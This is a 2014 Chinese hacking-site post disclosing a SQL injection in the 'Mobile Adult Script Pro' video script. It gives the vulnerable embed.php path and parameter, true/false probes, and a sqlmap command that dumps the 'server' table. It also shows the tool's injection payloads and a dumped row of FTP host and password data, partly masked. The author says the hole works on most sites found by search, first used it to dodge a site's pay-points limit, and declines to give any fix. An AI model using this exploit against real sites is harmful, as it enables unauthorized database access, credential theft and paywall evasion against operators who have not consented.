某国外成人网站系统通用型SQL注入漏洞下载

来源:黑吧安全网 浏览:707次 时间:2014-06-29
做网站找雨过天晴工作室

通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码

起因是因为国内某绅士网站观看学习视频需要积分,于是找到了视频播放页面就可以绕过积分限制了,后来测试了一下1=2会报错,sqlmap跑下库妥妥儿的。后来用手机登录网站发现标题和电脑登录的标题不同,显示的是Mobile Adult Script Pro 这个一看就是通用程序嘛,谷歌一下到官网发现官网提供的demo里面可以重现漏洞。

http://www.adultscriptpro.com/demo.html



google一下标题会发现不少使用此套程序的,有的需要改一下路径,基本全都可以搞定。

http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1

http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2

python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=2806 AND 6581=6581



    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

    Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=2806 AND SLEEP(5)

---

web application technology: PHP 5.4.26

back-end DBMS: MySQL 5.0

Database: ***

Table: server

[1 entry]

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| server_id | total_videos | url     | status | ftp_port | ftp_root | ftp_host       | last_used           | server_name    | rtmp_stream                    | lighttpd_url         | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| 2         | 2974         | <blank> | 1      | 21       | /        | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | ***         | P4ss#w0rD    | zx*****121   | /stream/        | apache           | rtmp             | 0                    |

 

漏洞修补方法:我这个小小的菜鸟级黑客只会挖掘漏洞我可不会修复漏洞,这种工作还是交给目标网站去做吧,谁让你开办一个这种美女集中脱光光衣服的网站,对青少年的身心健康影响很大啊,但是对于快播被封后的吊丝们还是有福音的哦,至少有了这种网站让孤独的吊丝晚上有了YY的对象